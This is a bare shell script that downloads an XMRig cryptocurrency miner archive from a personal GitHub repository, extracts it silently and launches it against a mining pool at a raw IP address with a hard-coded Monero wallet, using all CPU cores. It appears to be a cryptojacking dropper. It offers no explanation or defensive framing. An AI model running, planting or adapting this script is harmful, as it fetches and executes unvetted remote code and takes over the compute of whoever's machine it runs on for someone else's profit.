#!/bin/sh
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz >/dev/null 2>&1
./xmrig --donate-level 1 -o 159.223.114.25:443 -u 82i9fvbMSVFdU34Ph7btn9FsAvMocipLBNN17Vgf99a7CfMgt1LQzbcfN4KVZV9RD5YAMxxuw2wtJRALFM2LuYCzL8cByxD -p slow -a rx/0 -k -t $(nproc --all)
